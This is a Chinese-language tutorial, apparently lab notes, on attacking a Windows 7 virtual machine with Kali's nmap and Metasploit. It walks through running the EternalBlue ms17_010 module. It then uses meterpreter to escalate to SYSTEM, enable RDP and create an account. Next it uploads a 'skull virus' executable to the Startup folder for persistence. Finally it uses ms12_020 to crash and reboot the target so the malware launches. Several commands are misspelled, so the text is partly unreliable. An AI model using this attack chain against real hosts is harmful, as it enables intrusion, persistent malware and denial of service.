微软系统的漏洞的综合利用
首先在电脑里装入虚拟机vmware 下载kali和Windows7等镜像安装
利用工具kali里的nmap,msfconsole,永恒之蓝ms17-010和ms12-020两个漏洞
微软smbv1默认端口139,v2版本端口号445,文件共享smb,rdp(远程桌面)端口号3389,
ms12-020 可以使目标系统蓝屏 ms17-010 使smb的文件共享缓存溢出。
1.信息收集
使用ping命令检测网络的连通性
使用nmap端口扫描工具,通过开放的端口,检测目标系统所开放的服务。
信息分析。通过端口扫描工具获得的信息,分析开放的的端口是否有安全隐患
2.漏洞利用
使用kali平台的metersploit框架
msfconsole2查询框架中是否有漏洞模块 search
search ms17_010 3.调用漏洞模块 使用use命令 加模块名称 也可以调用模块的ID
use 04.设置攻击载荷 set
set lhost (本机ip地址)set rhosts (靶机ip地址)5.设置参数 (show options)
6.执行测试工具使用命令 run 或exploit执行
后渗透阶段
1.漏洞利用成功
2.后渗透阶段的命令提示行 meterpreter< (几个英文单词 fail-失败 succeed-成功)
3.在后渗透阶段下,查看自己的权限 使用的命令
getuid4.如果自己的权限不是系统权限的话需要提权
getsystem5.查看目标系统信息使用的命令(以windows为例)
需要先进入到shell
shellsysteminfo后渗透阶段操作的实例 (upload-上传 download-下载 cd 进入目录 )
1.开启rdp服务
在后渗透阶段下使用run命令post模块
run post/windos/manager/enablle_rdp2.创建用户账号
run post/windos/manager/enablle_rdp username = "新建的用户名" password = "新建的密码"tips:Windows server系统需要设置强密码 大小写字母加数字加特殊符号 进入shell可能乱码 chcp65001改为正常显示
文件管理
后渗透阶段上传文件命令 upload 路径
因为kali是基于Linux的 所以在渗透Windows系统的时候 需要把D:\下载\ (\改为反斜杠//)
upload /root/桌面骷髅病毒.exe C:\\ProgramData\\Microsoft\\Windows\\Start\ Menu\\Programs\\StartUp 此处的startup为开机自动启动文件夹
tips:一定要提前给虚拟机做快照 不然会很麻烦!!!
如果一切顺利 那么我们可以用ms12-020的模块使目标主机重启 这样对方开机后 骷髅病毒就会自动启动运行
search ms12_020搜索ms12_020 (search-搜索 scanner-扫描 post-端口 open-开放)
然后 use 你需要用到的载荷 例如use 1
use1还是需要设置一下rhost
set rhosts (靶机ip)设置完之后就可以run或者exploit运行
run之后目标系统就会蓝屏重启 重启后登陆上账户进入桌面就会发现骷髅病毒已经开始运行了
